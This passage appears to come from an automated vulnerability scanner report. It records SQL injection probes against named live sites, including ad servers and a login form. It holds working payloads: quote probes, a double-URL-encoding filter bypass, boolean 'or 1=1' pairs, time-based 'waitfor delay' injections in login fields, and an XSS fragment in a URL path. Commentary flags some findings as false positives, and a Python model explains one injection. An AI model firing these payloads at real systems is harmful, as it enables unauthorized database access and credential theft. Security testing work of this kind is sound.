GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315'&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:11:04 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 11209
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315''&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:11:05 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4486
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.16. http://googleads.g.doubleclick.net/pagead/ads [u_his parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_his parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_his parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4%2527&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:14:37 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 11502
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4%2527%2527&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:14:38 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4486
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.17. http://googleads.g.doubleclick.net/pagead/ads [u_java parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_java parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_java parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1'&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:15:00 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 11359
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1''&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:15:01 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4434
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.18. http://jobs.adoperationsonline.com/a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c

Summary

Severity:   High
Confidence:   Tentative
Host:   http://jobs.adoperationsonline.com
Path:   /a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c<img%20src=a%20onerror=alert(document.cookie

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 94881202'%20or%201%3d1--%20 and 94881202'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

For this finding the captures below do not support the claim: both responses are 200 OK with Content-Length 4295 and the same JSON body, and the only visible difference is the shabts Set-Cookie header in Response 1, which the application can set on its own regardless of the Referer. Treat this as a probable false positive unless varying only the Referer value reproduces a change in the body.

Request 1

GET /a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: jobs.adoperationsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=94881202'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Mar 2011 15:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: gc=1; expires=Sat, 19-Mar-2011 15:40:22 GMT; path=/
Set-Cookie: shabts=none; expires=Tue, 17-May-2011 15:40:22 GMT; path=/; domain=jobs.adoperationsonline.com
Set-Cookie: shut=deleted; expires=Thu, 18-Mar-2010 15:40:21 GMT; path=/
Set-Cookie: shmk=deleted; expires=Thu, 18-Mar-2010 15:40:21 GMT; path=/
Set-Cookie: shup=fvt%3D4d837ce6%26ncs%3D1%26lst%3D4d837ce6; expires=Sun, 17-Apr-2011 15:40:22 GMT; path=/
Cache-Control: no-cache, must-revalidate
Content-Length: 4295

jbb_widget_list_jobpostsd8b3c<img src=a onerror=alert(document.cookie({"version":"0.9","title":"Ad Operations and Online Media Jobs","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/find-jobs","description":"The latest jobs from jobs.adoperationsonline.com","language":"en-us","copyright":"Copyright 2007, Jobamatic","ttl":"60","price":"49","duration":30,"domain_name":"jobs.adoperationsonline.com","jobposts":[{"title":"Senior Director of Ad Operations","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/463369","company":"Relona","location":"New York, NY","pubDate":"Sun, 13 Mar 2011 21:52:11 -0700"},{"title":"Campaign Coordinator, Ad Operations","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462363","company":"Flixster","location":"San Francisco, CA","pubDate":"Thu, 10 Mar 2011 15:51:28 -0800"},{"title":"Advertising Operations Analyst","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462328","company":"Conde Nast","location":"New York, NY","pubDate":"Thu, 10 Mar 2011 13:39:55 -0800"},{"title":"Advertising Operations Manager","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462326","company":"Conde Nast","location":"New York, NY","pubDate":"Thu, 10 Mar 2011 13:39:55 -0800"},{"title":"Sr. Account Executive-Advertising","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/458649","company":"Bluecava","location":"New York, NY","pubDate":"Thu, 3 Mar 2011 12:55:47 -0800"}],"backfill_jobs":[{"title":"O
...[SNIP]...

Request 2

GET /a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: jobs.adoperationsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=94881202'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Mar 2011 15:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: gc=1; expires=Sat, 19-Mar-2011 15:40:22 GMT; path=/
Set-Cookie: shut=deleted; expires=Thu, 18-Mar-2010 15:40:21 GMT; path=/
Set-Cookie: shmk=deleted; expires=Thu, 18-Mar-2010 15:40:21 GMT; path=/
Set-Cookie: shup=fvt%3D4d837ce6%26ncs%3D1%26lst%3D4d837ce6; expires=Sun, 17-Apr-2011 15:40:22 GMT; path=/
Cache-Control: no-cache, must-revalidate
Content-Length: 4295

jbb_widget_list_jobpostsd8b3c<img src=a onerror=alert(document.cookie({"version":"0.9","title":"Ad Operations and Online Media Jobs","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/find-jobs","description":"The latest jobs from jobs.adoperationsonline.com","language":"en-us","copyright":"Copyright 2007, Jobamatic","ttl":"60","price":"49","duration":30,"domain_name":"jobs.adoperationsonline.com","jobposts":[{"title":"Senior Director of Ad Operations","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/463369","company":"Relona","location":"New York, NY","pubDate":"Sun, 13 Mar 2011 21:52:11 -0700"},{"title":"Campaign Coordinator, Ad Operations","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462363","company":"Flixster","location":"San Francisco, CA","pubDate":"Thu, 10 Mar 2011 15:51:28 -0800"},{"title":"Advertising Operations Analyst","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462328","company":"Conde Nast","location":"New York, NY","pubDate":"Thu, 10 Mar 2011 13:39:55 -0800"},{"title":"Advertising Operations Manager","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462326","company":"Conde Nast","location":"New York, NY","pubDate":"Thu, 10 Mar 2011 13:39:55 -0800"},{"title":"Sr. Account Executive-Advertising","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/458649","company":"Bluecava","location":"New York, NY","pubDate":"Thu, 3 Mar 2011 12:55:47 -0800"}],"backfill_jobs":[{"title":"Online Advertising, Sem, And Social Media Marketing Manager","link":"http:\/\/jobs.adoperationsonline.com\/a\
...[SNIP]...

1.19. http://login1.vindicosuite.com/vindico_dynamic.asp [password parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login1.vindicosuite.com
Path:   /vindico_dynamic.asp

Issue detail

The password parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the password parameter. The application took 21045 milliseconds to respond to the request, compared with 1043 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /vindico_dynamic.asp HTTP/1.1
Host: login1.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://login1.vindicosuite.com/default.asp?message=Invalid%20Username%20and%20or%20Password
Content-Length: 19
Cache-Control: max-age=0
Origin: http://login1.vindicosuite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725; ASPSESSIONIDQSCTCRCD=JJLIAGCCIOANALFDFGDFNGCO

username=&password='waitfor%20delay'0%3a0%3a20'--

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2294
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2011 15:58:19 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...

1.20. http://login1.vindicosuite.com/vindico_dynamic.asp [username parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login1.vindicosuite.com
Path:   /vindico_dynamic.asp

Issue detail

The username parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the username parameter. The application took 21010 milliseconds to respond to the request, compared with 1043 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

The response body also confirms the mechanism: the procedure VINDICO_Authenticate complains that @password was not supplied, which is what happens when the login page concatenates the form fields into a positional EXEC call and the quote plus -- in the username cuts the statement off before the second argument. The stacked waitfor delay then runs as its own statement, which accounts for the 21 second response.

Request

POST /vindico_dynamic.asp HTTP/1.1
Host: login1.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://login1.vindicosuite.com/default.asp?message=Invalid%20Username%20and%20or%20Password
Content-Length: 19
Cache-Control: max-age=0
Origin: http://login1.vindicosuite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725; ASPSESSIONIDQSCTCRCD=JJLIAGCCIOANALFDFGDFNGCO

username='waitfor%20delay'0%3a0%3a20'--&password=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2011 15:56:31 GMT

<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_Authenticate' expects parameter '@password', which was not sup
...[SNIP]...
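
The two findings above are the clearest in the report, and the error text in 1.20 tells you more than the timing does: the server received only one argument for VINDICO_Authenticate, so the quote in the username closed the first literal early, waitfor delay became a statement of its own, and -- discarded the password argument. The Python below is an added example, not code from the page or from the site's ASP, that models this with a small literal-aware T-SQL tokenizer. The EXEC shape in build_exec and the procedure's positional argument order are assumptions, since the page shows only the leaked error.

```python
import re

WORD = re.compile(r"[A-Za-z_@][A-Za-z0-9_@]*")


def build_exec(username: str, password: str) -> str:
    """Assumed shape of the statement the login page builds (not shown on the
    page); it is consistent with the leaked 'expects parameter @password' error."""
    return f"EXEC VINDICO_Authenticate '{username}', '{password}'"


def quote_double(value: str) -> str:
    """Escape by doubling quotes, the mechanism behind the scanner's second
    probe. Shown for contrast only; production code should bind parameters."""
    return value.replace("'", "''")


def tokenize(sql: str):
    """Tokenize T-SQL the way the server sees it: single-quoted literals
    (with '' escapes) are opaque, and '--' outside a literal discards the
    rest of the line."""
    tokens = []
    i, n = 0, len(sql)
    while i < n:
        c = sql[i]
        if c.isspace():
            i += 1
        elif c == "'":
            j, buf = i + 1, []
            while j < n:
                if sql[j] == "'":
                    if j + 1 < n and sql[j + 1] == "'":   # escaped quote
                        buf.append("'")
                        j += 2
                        continue
                    break                                # closing quote
                buf.append(sql[j])
                j += 1
            tokens.append(("str", "".join(buf)))
            i = j + 1
        elif sql.startswith("--", i):
            break  # line comment: everything after it is gone
        elif c == ",":
            tokens.append(("comma", c))
            i += 1
        else:
            m = WORD.match(sql, i)
            if m:
                tokens.append(("word", m.group(0)))
                i = m.end()
            else:
                tokens.append(("punct", c))
                i += 1
    return tokens


def is_kw(tok, name: str) -> bool:
    return tok[0] == "word" and tok[1].upper() == name


def analyze(sql: str):
    """Return (procedure, number of arguments the procedure receives,
    seconds of WAITFOR DELAY that run as a separate statement)."""
    toks = tokenize(sql)
    if len(toks) < 2 or not is_kw(toks[0], "EXEC"):
        raise ValueError("expected an EXEC statement")
    proc = toks[1][1]
    args, delay, i = 0, 0, 2
    # Every literal up to the next statement keyword is a positional argument.
    while i < len(toks) and not is_kw(toks[i], "WAITFOR"):
        if toks[i][0] == "str":
            args += 1
        i += 1
    # A WAITFOR that escaped the literal runs as its own statement.
    if i + 2 < len(toks) and is_kw(toks[i + 1], "DELAY") and toks[i + 2][0] == "str":
        h, m, s = (int(x) for x in toks[i + 2][1].split(":"))
        delay = h * 3600 + m * 60 + s
    return proc, args, delay


if __name__ == "__main__":
    payload = "'waitfor delay'0:0:20'--"   # decoded form of the probe in 1.19 and 1.20
    for label, u, p in [("normal login", "alice", "s3cret"),
                        ("payload in password (1.19)", "", payload),
                        ("payload in username (1.20)", payload, ""),
                        ("quotes doubled", quote_double(payload), "")]:
        print(f"{label:28} -> {analyze(build_exec(u, p))}")
```

The third case reproduces the report: with the payload in the username the procedure receives one argument, which is the 'expects parameter @password' error in 1.20, while in the password it still receives two and the page merely redirects after the 20 second sleep, as 1.19 shows. Doubling quotes defeats this particular payload, but the fix is an ADODB.Command or sp_executesql call with typed parameters, so the form fields never reach the SQL text at all.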

1.21. http://nydailynews.stats.com/fb/scoreboard.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://nydailynews.stats.com
Path:   /fb/scoreboard.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 78970613'%20or%201%3d1--%20 and 78970613'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Here the difference is explained without SQL: Response 1 comes from a server announcing Microsoft-IIS/7.0 and is the IIS 7 detailed 404 page, Response 2 from one announcing Microsoft-IIS/6.0 and is the IIS 6 generic 404 page. Two requests landing on different members of a mixed server pool produce exactly this, both are 404 Not Found, and a directory name is an unlikely place for database access, so this finding should be treated as a false positive.

Request 1

